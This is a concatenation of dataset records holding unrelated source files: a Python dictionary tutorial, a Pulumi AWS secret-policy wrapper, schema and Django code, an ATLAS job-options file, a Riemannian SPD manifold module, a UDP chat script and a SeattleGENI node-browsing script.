98f7bb1314330138f0cb9901e764f6da8cd5605b
|
/5_python基础/3_字典.py
|
15720e3b4ac0d7bcd22295c0e97684183fa0bb02
|
[] |
no_license
|
1071183139/biji
|
c964e197ea0845dbfdd98213743130668770f929
|
02c2e6f69ceb557448b959c44723b4bf498e90c9
|
refs/heads/master
| 2022-12-17T06:46:27.920479 | 2019-10-26T12:02:54 | 2019-10-26T12:02:54 | 217,701,979 | 0 | 0 | null | 2022-12-07T23:55:02 | 2019-10-26T11:57:28 |
Python
|
UTF-8
|
Python
| false | false | 2,053 |
py
|
# 根据键访问值
info = {'name': '班长', 'id': 100, 'sex': 'f', 'address': '地球亚洲中国北京'}
# print(info['name'])
# print(info['names']) # 键不存在会报错
# get 获取 设置默认值 不存在不会报错
# print(info.get('id'))
# print(info.get('ids','没有这个键'))
# 常见的操作 (修改,增减,删除)
# 修改元素
# new_id=input('请输入元素')
# info['id']=new_id
# print(info1)
# 增加元素 第二个例子
# 如果访问的键存在,就是修改值
# info['id']=18
# print(info)
# 如果访问的键不存在,就是增加元素。
# info['id']=18
# print(info)
# 删除元素(del clear)
# del info[] 或者 del info 删除整个字典
# del info['name']
print(info)
# del info['pp'] # 键不存在会报错
# print(info)
# del info #一种是del加空格,另一种是del()
# print(info) # 删除字典后,字典就不存在。
# clear 清除字典 字典还是存在的,只不过是空字典。
# info.clear()
# print(info) # {}
# 常见的操作2 (len ,keys ,values,items,has_key)
# len 测量字典中,键值对的个数
# print(len(info))
# keys 返回一个包含字典所有KEY的列表
# print(info.keys())
# values 返回一个包含字典中所有值的列表
# print(info.values())
# items 返回一个包含所有(键,值)元祖的列表
# print(info.items()) #[('name', '班长'), ('id', 100), ('sex', 'f'), ('address', '地球亚洲中国北京')]
# in, not in 判断键是否在字典中
# print('name' in info)
# 遍历
for item in info.items():
print(item)
for key,value in info.items():
print(key,value)
# print(type(key,value))
# 带下标的索引
chars = ['a', 'b', 'c', 'd','f']
chars1=('a','c','v','d','h')
# i = 0
# for chr in chars:
# print("%d %s"%(i, chr))
# i += 1
# enumerate # 枚举 列表和元祖都可以。
for i,chr in enumerate(chars1):
print('%d %s'%(i,chr))
a=(1,2,3,4)
b=('a','b','c','d')
c=a+b
print(a+b)
|
[
"[email protected]"
] | |
fa14b434145cd963ca27a6eef951a8dff89d13d1
|
62bbfb6c50bba16304202aea96d1de4990f95e04
|
/dependencies/pulumi_aws/secretsmanager/secret_policy.py
|
81618991d5edb3f606dbf67e2ea3567c4dac6497
|
[] |
no_license
|
adriell/lambda-autoservico-storagegateway
|
b40b8717c8de076e61bbd422461c7d624a0d2273
|
f6e3dea61b004b73943a5438c658d3f019f106f7
|
refs/heads/main
| 2023-03-16T14:41:16.821675 | 2021-03-11T03:30:33 | 2021-03-11T03:30:33 | 345,865,704 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,885 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
__all__ = ['SecretPolicy']
class SecretPolicy(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Provides a resource to manage AWS Secrets Manager secret policy.
## Example Usage
### Basic
```python
import pulumi
import pulumi_aws as aws
example_secret = aws.secretsmanager.Secret("exampleSecret")
example_secret_policy = aws.secretsmanager.SecretPolicy("exampleSecretPolicy",
secret_arn=example_secret.arn,
policy=\"\"\"{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "EnableAllPermissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
\"\"\")
```
## Import
`aws_secretsmanager_secret_policy` can be imported by using the secret Amazon Resource Name (ARN), e.g.
```sh
$ pulumi import aws:secretsmanager/secretPolicy:SecretPolicy example arn:aws:secretsmanager:us-east-1:123456789012:secret:example-123456
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['block_public_policy'] = block_public_policy
if policy is None and not opts.urn:
raise TypeError("Missing required property 'policy'")
__props__['policy'] = policy
if secret_arn is None and not opts.urn:
raise TypeError("Missing required property 'secret_arn'")
__props__['secret_arn'] = secret_arn
super(SecretPolicy, __self__).__init__(
'aws:secretsmanager/secretPolicy:SecretPolicy',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
block_public_policy: Optional[pulumi.Input[bool]] = None,
policy: Optional[pulumi.Input[str]] = None,
secret_arn: Optional[pulumi.Input[str]] = None) -> 'SecretPolicy':
"""
Get an existing SecretPolicy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_public_policy: Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
:param pulumi.Input[str] secret_arn: Secret ARN.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["block_public_policy"] = block_public_policy
__props__["policy"] = policy
__props__["secret_arn"] = secret_arn
return SecretPolicy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="blockPublicPolicy")
def block_public_policy(self) -> pulumi.Output[Optional[bool]]:
"""
Makes an optional API call to Zelkova to validate the Resource Policy to prevent broad access to your secret.
"""
return pulumi.get(self, "block_public_policy")
@property
@pulumi.getter
def policy(self) -> pulumi.Output[str]:
return pulumi.get(self, "policy")
@property
@pulumi.getter(name="secretArn")
def secret_arn(self) -> pulumi.Output[str]:
"""
Secret ARN.
"""
return pulumi.get(self, "secret_arn")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
[
"[email protected]"
] | |
553f3d89c11483b36ae1a20c082db45382ae9e15
|
3b786d3854e830a4b46ee55851ca186becbfa650
|
/SystemTesting/pylib/nsx/vsm/edge/edge_sslvpnconfig_schema/edge_sslvpnconfig_layout_configuration_schema.py
|
68a4bace81fb3982ea88b3dfde93326a01c98ec6
|
[] |
no_license
|
Cloudxtreme/MyProject
|
d81f8d38684333c22084b88141b712c78b140777
|
5b55817c050b637e2747084290f6206d2e622938
|
refs/heads/master
| 2021-05-31T10:26:42.951835 | 2015-12-10T09:57:04 | 2015-12-10T09:57:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 885 |
py
|
import base_schema
class SSLVPNConfigLayoutConfigurationSchema(base_schema.BaseSchema):
_schema_name = "layoutConfiguration"
def __init__(self, py_dict=None):
""" Constructor to create
SSLVPNConfigLayoutConfigurationSchema object
@param py_dict : python dictionary to construct this object
"""
super(SSLVPNConfigLayoutConfigurationSchema, self).__init__()
self.set_data_type('xml')
self.portalTitle = None
self.companyName = None
self.logoExtention = None
self.logoUri = None
self.logoBackgroundColor = None
self.titleColor = None
self.topFrameColor = None
self.menuBarColor = None
self.rowAlternativeColor = None
self.bodyColor = None
self.rowColor = None
if py_dict is not None:
self.get_object_from_py_dict(py_dict)
|
[
"[email protected]"
] | |
c47ab8e7d986152e8f436c75f1e649796e2231bb
|
054bc8696bdd429e2b3ba706feb72c0fb604047f
|
/python/utils/CheckInRange/CheckInRange.py
|
b984a85c12b190cb26df2a3aebfbf2bf794a9fde
|
[] |
no_license
|
wavefancy/WallaceBroad
|
076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f
|
fbd00e6f60e54140ed5b4e470a8bdd5edeffae21
|
refs/heads/master
| 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,555 |
py
|
#!/usr/bin/env python3
"""
Keep/Remove records in range.
@Author: [email protected]
Usage:
CheckInRange.py -r file -c int [-e]
CheckInRange.py -h | --help | -v | --version | -f | --format
Notes:
1. Read content from stdin, and output result to stdout.
2. Column index start from 1.
Options:
-c int Column index for value.
-r file Range file, two columns, range_start range_end.
-e Exclude(Remove) records in defined range, default Include(Keep).
-f --format Show example.
-h --help Show this screen.
-v --version Show version.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE,SIG_DFL)
# pip install pyinterval
# https://pyinterval.readthedocs.io/en/latest/install.html
try:
from interval import interval
except:
sys.stderr.write('ERROR for import package "interval"!\nPlease install by "pip install pyinterval"!\n')
sys.exit(-1)
def ShowFormat():
print('''
# input
#-----------------
100 10
1000000 20
5000000 20
7000000 3
10000000 30
#range file:
#-----------------
1000000 5000000
# cat in.txt | python3 CheckInRange.py -r range.txt -c 1
#-----------------
1000000 20
5000000 20
cat in.txt | python3 CheckInRange.py -r range.txt -c 1 -e
#-----------------
100 10
7000000 3
10000000 30
''')
if __name__ == '__main__':
args = docopt(__doc__, version='3.0')
#print(args)
if(args['--format']):
ShowFormat()
sys.exit(-1)
#
colValue = int(args['-c']) -1
keep = True
if args['-e']:
keep = False
irange = interval()
with open(args['-r'],'r') as inf:
for line in inf:
line = line.strip()
if line:
ss = line.split()
irange = irange | interval[float(ss[0]), float(ss[1])]
#-------------------------------------------------
for line in sys.stdin:
line = line.strip()
if line:
ss = line.split()
try:
v = int(ss[colValue])
if keep:
if v in irange:
sys.stdout.write('%s\n'%(line))
else:
if not (v in irange):
sys.stdout.write('%s\n'%(line))
except ValueError:
sys.stderr.write('WARN: parse value error(skiped): %s\n'%(line))
sys.stdout.flush()
sys.stdout.close()
sys.stderr.flush()
sys.stderr.close()
|
[
"[email protected]"
] | |
82a535bcf1ac49a0530f8b1435d3329a2280a09b
|
118124f2e903dab8a425c6d99e7ac8fa6f559aa4
|
/devel/py-repoze.xmliter/files/patch-setup.py
|
ccbbb76a7d9156aabc0ee41314c870b7f15170f0
|
[] |
no_license
|
mneumann/DPorts
|
30b3abfdf58b63698bc66c8614073e3366b5fd71
|
d511cdf563ed8133ea75670bfa6e3e895495fefd
|
refs/heads/master
| 2020-12-26T00:46:41.527700 | 2015-01-27T14:54:22 | 2015-01-27T14:54:22 | 28,131,197 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 431 |
py
|
--- setup.py.orig 2014-09-21 15:40:44 UTC
+++ setup.py
@@ -43,7 +43,7 @@ setup(name='repoze.xmliter',
author_email="[email protected]",
url="http://www.repoze.org",
license="BSD-derived (http://www.repoze.org/LICENSE.txt)",
- packages=find_packages(),
+ packages = ['repoze', 'repoze.xmliter'],
include_package_data=True,
namespace_packages=['repoze'],
zip_safe=False,
|
[
"[email protected]"
] | |
024d663ec6247259c4849e881e211d74a27a846a
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/Generators/PowhegControl/examples/processes/MC15.101010.PowhegPythia8EvtGen_A14NNPDF23_VBF_W_example.py
|
0eed1637cfa4f4c7d9a0b3470d317a5272088e7b
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,095 |
py
|
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
#--------------------------------------------------------------
# EVGEN configuration
#--------------------------------------------------------------
evgenConfig.description = "POWHEG+Pythia8 VBF W production with A14 NNPDF2.3 tune."
evgenConfig.keywords = ["SM", "VBF", "W"]
evgenConfig.contact = ["[email protected]"]
# --------------------------------------------------------------
# Load ATLAS defaults for the Powheg VBF_W process
# --------------------------------------------------------------
include("PowhegControl/PowhegControl_VBF_W_Common.py")
# --------------------------------------------------------------
# Generate events
# --------------------------------------------------------------
PowhegConfig.generate()
#--------------------------------------------------------------
# Pythia8 showering with the A14 NNPDF2.3 tune
#--------------------------------------------------------------
include("MC15JobOptions/Pythia8_A14_NNPDF23LO_EvtGen_Common.py")
include("MC15JobOptions/Pythia8_Powheg.py")
|
[
"[email protected]"
] | |
7d77907d67969dbeb7a841f56e36294174ac81b0
|
2e2cb71a102c144427f3a3d4c3f2717472e1a2ac
|
/SPD.py
|
6257cf5234470ceb1b82217a8de233f0b56533d4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
pdhung3012/RegGNN
|
740af76d90740c38f6be502ed6f9495b6d59a4a8
|
a383562121d205f7bb86751242882b7e815eee3f
|
refs/heads/main
| 2023-07-08T13:43:41.903844 | 2021-08-16T07:55:31 | 2021-08-16T07:55:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,128 |
py
|
'''
Tools for computing topological features in Riemannian space.
Code taken from https://morphomatics.github.io/,
created by Felix Ambellan and Martin Hanik and Christoph von Tycowicz, 2021.
'''
import numpy as np
import numpy.random as rnd
import numpy.linalg as la
from scipy.linalg import logm, expm_frechet
from pymanopt.manifolds.manifold import Manifold
from pymanopt.tools.multi import multisym
class SPD(Manifold):
"""Returns the product manifold Sym+(d)^k, i.e., a product of k dxd symmetric positive matrices (SPD).
manifold = SPD(k, d)
Elements of Sym+(d)^k are represented as arrays of size kxdxd where every dxd slice is an SPD matrix, i.e., a
symmetric matrix S with positive eigenvalues.
The Riemannian metric used is the product Log-Euclidean metric that is induced by the standard Euclidean trace
metric; see
Arsigny, V., Fillard, P., Pennec, X., and Ayache., N.
Fast and simple computations on tensors with Log-Euclidean metrics.
"""
def __init__(self, k=1, d=3):
if d <= 0:
raise RuntimeError("d must be an integer no less than 1.")
if k == 1:
self._name = 'Manifold of symmetric positive definite {d} x {d} matrices'.format(d=d, k=k)
elif k > 1:
self._name = 'Manifold of {k} symmetric positive definite {d} x {d} matrices (Sym^+({d}))^{k}'.format(d=d, k=k)
else:
raise RuntimeError("k must be an integer no less than 1.")
self._k = k
self._d = d
def __str__(self):
return self._name
@property
def dim(self):
return int((self._d*(self._d+1)/2) * self._k)
@property
def typicaldist(self):
# typical affine invariant distance
return np.sqrt(self._k * 6)
def inner(self, S, X, Y):
"""product metric"""
return np.sum(np.einsum('...ij,...ij', X, Y))
def norm(self, S, X):
"""norm from product metric"""
return np.sqrt(self.inner(S, X, X))
def proj(self, X, H):
"""orthogonal (with respect to the Euclidean inner product) projection of ambient
vector ((k,3,3) array) onto the tangent space at X"""
return dlog(X, multisym(H))
def egrad2rgrad(self,X,D):
# should be adj_dexp instead of dexp (however, dexp appears to be self-adjoint for symmetric matrices)
return dexp(log_mat(X), multisym(D))
def ehess2rhess(self, X, Hess):
# TODO
return
def exp(self, S, X):
"""Riemannian exponential with base point S evaluated at X"""
assert S.shape == X.shape
# (avoid additional exp/log)
Y = X + log_mat(S)
vals, vecs = la.eigh(Y)
return np.einsum('...ij,...j,...kj', vecs, np.exp(vals), vecs)
retr = exp
def log(self, S, U):
"""Riemannian logarithm with base point S evaluated at U"""
assert S.shape == U.shape
# (avoid additional log/exp)
return log_mat(U) - log_mat(S)
def geopoint(self, S, T, t):
""" Evaluate the geodesic from S to T at time t in [0, 1]"""
assert S.shape == T.shape and np.isscalar(t)
return self.exp(S, t * self.log(S, T))
def rand(self):
S = np.random.random((self._k, self._d, self._d))
return np.einsum('...ij,...kj', S, S)
def randvec(self, X):
Y = self.rand()
y = self.log(X, Y)
return y / self.norm(X, y)
def zerovec(self, X):
return np.zeros((self._k, self._d, self._d))
def transp(self, S, T, X):
"""Parallel transport for Sym+(d)^k.
:param S: element of Symp+(d)^k
:param T: element of Symp+(d)^k
:param X: tangent vector at S
:return: parallel transport of X to the tangent space at T
"""
assert S.shape == T.shape == X.shape
# if X were not in algebra but at tangent space at S
#return dexp(log_mat(T), dlog(S, X))
return X
def eleminner(self, R, X, Y):
"""element-wise inner product"""
return np.einsum('...ij,...ij', X, Y)
def elemnorm(self, R, X):
"""element-wise norm"""
return np.sqrt(self.eleminner(R, X, X))
def projToGeodesic(self, X, Y, P, max_iter=10):
'''
:arg X, Y: elements of Symp+(d)^k defining geodesic X->Y.
:arg P: element of Symp+(d)^k to be projected to X->Y.
:returns: projection of P to X->Y
'''
assert X.shape == Y.shape
assert Y.shape == P.shape
# all tagent vectors in common space i.e. algebra
v = self.log(X, Y)
v /= self.norm(X, v)
w = self.log(X, P)
d = self.inner(X, v, w)
return self.exp(X, d * v)
def pairmean(self, S, T):
assert S.shape == T.shape
return self.exp(S, 0.5 * self.log(S, T))
def dist(self, S, T):
"""Distance function in Sym+(d)^k"""
return self.norm(S, self.log(S,T))
def adjJacobi(self, S, T, t, X):
"""Evaluates an adjoint Jacobi field along the geodesic gam from S to T
:param S: element of the space of differential coordinates
:param T: element of the space of differential coordinates
:param t: scalar in [0,1]
:param X: tangent vector at gam(t)
:return: tangent vector at X
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
U = self.geopoint(S, T, t)
return (1 - t) * self.transp(U, S, X)
def adjDxgeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the starting point S at X,
i.e, the adjoint of d_S gamma(t; ., T) applied to X, which is en element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(S, T, t, X)
def adjDygeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the endpoint T at X,
i.e, the adjoint of d_T gamma(t; S, .) applied to X, which is en element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(T, S, 1 - t, X)
def log_mat(U):
"""Matrix logarithm, only use for normal matrices U, i.e., U * U^T = U^T * U"""
vals, vecs = la.eigh(U)
vals = np.log(np.where(vals > 1e-10, vals, 1))
return np.real(np.einsum('...ij,...j,...kj', vecs, vals, vecs))
def dexp(X, G):
"""Evaluate the derivative of the matrix exponential at
X in direction G.
"""
return np.array([expm_frechet(X[i],G[i])[1] for i in range(X.shape[0])])
def dlog(X, G):
"""Evaluate the derivative of the matrix logarithm at
X in direction G.
"""
n = X.shape[1]
# set up [[X, G], [0, X]]
W = np.hstack((np.dstack((X, G)), np.dstack((np.zeros_like(X), X))))
return np.array([logm(W[i])[:n, n:] for i in range(X.shape[0])])
def vectime3d(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
"""
assert np.size(x.shape[0]) == 2 and np.size(A) == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[0] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
def vectime3dB(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
In case of k=1, x * A is returned.
"""
if np.isscalar(x) and A.ndim == 2:
return x * A
x = np.atleast_2d(x)
assert x.ndim <= 2 and np.size(A.shape) == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[1] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
|
[
"[email protected]"
] | |
4d4bf41cfc6668556e18405c2b1da9e6f85f8787
|
e0e96b8d26cd12c16a3e4a6265b6bceb11c4b1f0
|
/17day/updtest.py
|
2d6ca62c4a6dff1d92723fc2cea303250088b3cf
|
[] |
no_license
|
superwenqistyle/2-2018python
|
4419bc4ae4700e5b7839c4974106e03fc33e85f8
|
76e5ea72413abfa774ad61b3bdff76eba0c5e16c
|
refs/heads/master
| 2020-03-13T11:08:50.860361 | 2018-05-22T11:17:39 | 2018-05-22T11:17:39 | 131,096,306 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 713 |
py
|
from socket import *
from threading import Thread
from time import ctime
Id=""
port=0
updSocket=None
def send():
while True:
message=input("请输入内容:")
updSocket.sendto(message.encode("gb2312"),(Id,port))
def receive():
while True:
content=updSocket.recvfrom(1024)
print("%s-%s\n请输入内容:"%(content[0].decode("gb2312"),content[1][0]),end="")
def main():
global Id
global port
global updSocket
Id = input("输入对方的id:")
port = int(input("输入对方的端口号:"))
updSocket = socket(AF_INET,SOCK_DGRAM)
updSocket.bind(("",6666))
t = Thread(target=send)
t1 = Thread(target=receive)
t.start()
t1.start()
t.join()
t1.join()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
1626df6646682430eb9d47c57614e0fc6c70476f
|
194124b184101bbeb18c00482a1f60a6dd32eebf
|
/blog/migrations/0002_category.py
|
a811ab55f0b35be64c8208579dfff5eb7e36a19a
|
[] |
no_license
|
fc-wsd/s4-instablog
|
2fc758461f09fe124b28d86d29d4df429ef72040
|
8e38b07fe7dae0378fda228f2cfa7752f93254c9
|
refs/heads/master
| 2021-01-10T12:13:09.293036 | 2015-12-12T06:13:34 | 2015-12-12T06:13:34 | 45,733,935 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 660 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),
('name', models.CharField(max_length=200)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"[email protected]"
] | |
01b828d2865b4a3207556680e892c62aa6f28e15
|
2b468b1d22ecc5668529255676a1d43936829074
|
/codes/personal_backend/tuoen/abs/service/product/__init__.py
|
43853f724363e33396251d2f10c21af53b191a1a
|
[] |
no_license
|
MaseraTiGo/4U
|
5ac31b4cccc1093ab9a07d18218c3d8c0157dc9c
|
f572830aa996cfe619fc4dd8279972a2f567c94c
|
refs/heads/master
| 2023-07-26T09:44:21.014294 | 2023-07-13T03:43:34 | 2023-07-13T03:43:34 | 149,217,706 | 0 | 0 | null | 2020-06-05T20:38:16 | 2018-09-18T02:34:29 |
Python
|
UTF-8
|
Python
| false | false | 3,304 |
py
|
# coding=UTF-8
'''
Created on 2016年7月22日
@author: Administrator
'''
import hashlib
import datetime
import json
import random
from django.db.models import Q
from tuoen.sys.core.exception.business_error import BusinessError
from tuoen.sys.utils.common.split_page import Splitor
from model.models import ProductModel
from model.models import Product
class ProductOperateServer(object):
@classmethod
def add(cls, **attrs):
"""add new product"""
if Product.query(name=attrs['name']):
BusinessError("产品名称已存在")
product = Product.create(**attrs)
if not product:
raise BusinessError("产品添加失败")
@classmethod
def update(cls, **attrs):
"""修改产品信息"""
if 'name' in attrs:
name = attrs['name']
id_qs = [p.id for p in Product.query(name=name)]
if id_qs and attrs['id'] not in id_qs:
raise BusinessError("产品名称已存在")
product = Product().update(**attrs)
return product
@classmethod
def search(cls, current_page, **search_info):
"""查询产品列表"""
if 'keyword' in search_info:
keyword = search_info.pop('keyword')
product_qs = Product.search(**search_info).filter(Q(name__contains = keyword) | \
Q(id__contains = keyword))
else:
product_qs = Product.search(**search_info)
product_qs = product_qs.order_by("-create_time")
return Splitor(current_page, product_qs)
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
Product.query(id=id).delete()
return True
class ProductModelServer(object):
@classmethod
def add(cls, **attrs):
"""add new product model"""
if ProductModel.query(name=attrs['name']):
BusinessError("产品型号已存在")
product_id = attrs['product']
product = Product.get_byid(product_id)
attrs.update({"product": product})
product_model = ProductModel.create(**attrs)
if not product_model:
raise BusinessError("产品型号添加失败")
@classmethod
def update(cls, **attrs):
"""修改产品型号信息"""
product = ProductModel.query(id=attrs['id'])[0].product
attrs.update({'product': product})
if 'name' in attrs:
name = attrs['name']
product__model_ids = [pm.id for pm in ProductModel.query(name=name)]
if product__model_ids and attrs['id'] not in product__model_ids:
raise BusinessError("产品型号已存在")
product__model = ProductModel().update(**attrs)
return product__model
@classmethod
def search(cls, **search_info):
""""查询产品型号"""
product_id = search_info.pop('id')
product = Product.get_byid(product_id)
product_model_qs = ProductModel.search(product=product)
product_model_qs = product_model_qs.order_by("-create_time")
return product_model_qs
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
ProductModel.query(id=id).delete()
return True
|
[
"[email protected]"
] | |
919890dfa27b2785488ab4ec815c2d7c9bf0faa7
|
9cac3bc1c61f4de32251072e49c50b0543450490
|
/examples/find_available_seattlegeni_vessels.py
|
412176990dffaec0800a9c6acb8ef925e3c14bd2
|
[
"MIT"
] |
permissive
|
SeattleTestbed/experimentmanager
|
40b036028809fa77dcdec804d58853f679e326de
|
31c52f35fba1e367b1177b3a95ae65b4dd0e1a1c
|
refs/heads/master
| 2020-12-25T17:34:49.713296 | 2017-05-15T11:37:36 | 2017-05-15T11:37:36 | 20,136,879 | 0 | 5 | null | 2016-08-29T09:00:07 | 2014-05-24T18:43:36 |
Python
|
UTF-8
|
Python
| false | false | 4,356 |
py
|
"""
This script will look up all active nodes that are part of a testbed managed
by SeattleGENI and determine which vessels on those nodes are available.
This information could be used in various ways, one of them being to gather
information about those node locations, such as latency from a certain
location, and decide which vessels to acquire based on that information.
Note: This script can result in a large amount of of node communication.
Specifically, it will try to communicate with every node that is part of
the testbed.
Example output of this script:
Number of advertising nodes: 452
DEBUG: only looking at 5 nodes.
Failure on NAT$2dfeca92a68744eb493cf5ba5559cdcee03684c5v2:1224: Connection Refused! ['[Errno 111] Connection refused']
On 1.1.1.1:1224 found 6 available vessels
On 4.4.4.4:1224 found 6 available vessels
On 3.3.3.3:1224 found 5 available vessels
Failure on 2.2.2.2:1224: timed out
Number of nodes that SeattleGENI vessels are available on: 3
"""
import sys
import traceback
# If this script resides outside of the directory that contains the seattlelib
# files and experimentlib.py, then you'll need to set that path here.
EXPERIMENTLIB_DIRECTORY = "./experimentlibrary/"
sys.path.append(EXPERIMENTLIB_DIRECTORY)
import experimentlib
# This can be used to adjust how many threads are used for concurrently
# contacting nodes when experimentlib.run_parallelized() is called.
#experimentlib.num_worker_threads = 10
# The public key that all seattlegeni nodes advertise under.
SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME = "seattlegeni_advertisement.publickey"
# Useful for development. Only contact this many nodes.
MAX_NODES_TO_LOOK_AT = 5
def main():
identity = experimentlib.create_identity_from_key_files(SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME)
nodelocation_list = experimentlib.lookup_node_locations_by_identity(identity)
print("Number of advertising nodes: " + str(len(nodelocation_list)))
if MAX_NODES_TO_LOOK_AT is not None:
print("DEBUG: only looking at " + str(MAX_NODES_TO_LOOK_AT) + " nodes.")
nodelocation_list = nodelocation_list[:MAX_NODES_TO_LOOK_AT]
# Talk to each nodemanager to find out vessel information.
browse_successlist, failurelist = \
experimentlib.run_parallelized(nodelocation_list, browse_node_for_available_vessels)
# Create a dictionary whose keys are the nodeids and values are lists of
# vesseldicts of the available vessels on that node.
available_vesseldicts_by_node = {}
for (nodeid, available_vesseldicts) in browse_successlist:
if available_vesseldicts:
available_vesseldicts_by_node[nodeid] = available_vesseldicts
print("Number of nodes that SeattleGENI vessels are available on: " +
str(len(available_vesseldicts_by_node.keys())))
def browse_node_for_available_vessels(nodelocation):
"""
Contact the node at nodelocation and return a list of vesseldicts
for each vessel on the node.
"""
try:
# Ask the node for information about the vessels on it.
vesseldict_list = experimentlib.browse_node(nodelocation)
# Gather up a list of vesseldicts of the available vessels.
available_vesseldict_list = []
for vesseldict in vesseldict_list:
if is_vessel_available(vesseldict):
available_vesseldict_list.append(vesseldict)
# Just so we can watch the progress, print some output.
# We display the nodelocation rather than the nodeid because it's more
# interesting to look at, even though nodes can change location and this
# isn't a unique identifier of the node.
print("On " + nodelocation + " found " +
str(len(available_vesseldict_list)) + " available vessels")
return available_vesseldict_list
except experimentlib.NodeCommunicationError, e:
print("Failure on " + nodelocation + ": " + str(e))
except:
traceback.print_exc()
def is_vessel_available(vesseldict):
"""
This returns True or False depending on whether the vesseldict indicates an
an available vessel. That is, one that can be acquired through SeattleGENI.
"""
if vesseldict['vesselname'] == 'v2':
# v2 is a special vessel that will never be available from SeattleGENI.
return False
else:
# If there are no userkeys, the vessel is available.
return len(vesseldict['userkeys']) == 0
if __name__ == "__main__":
main()
|
[
"USER@DOMAIN"
] |
USER@DOMAIN
|
871588cf841884f7fc798cea219e466dad82e5ed
|
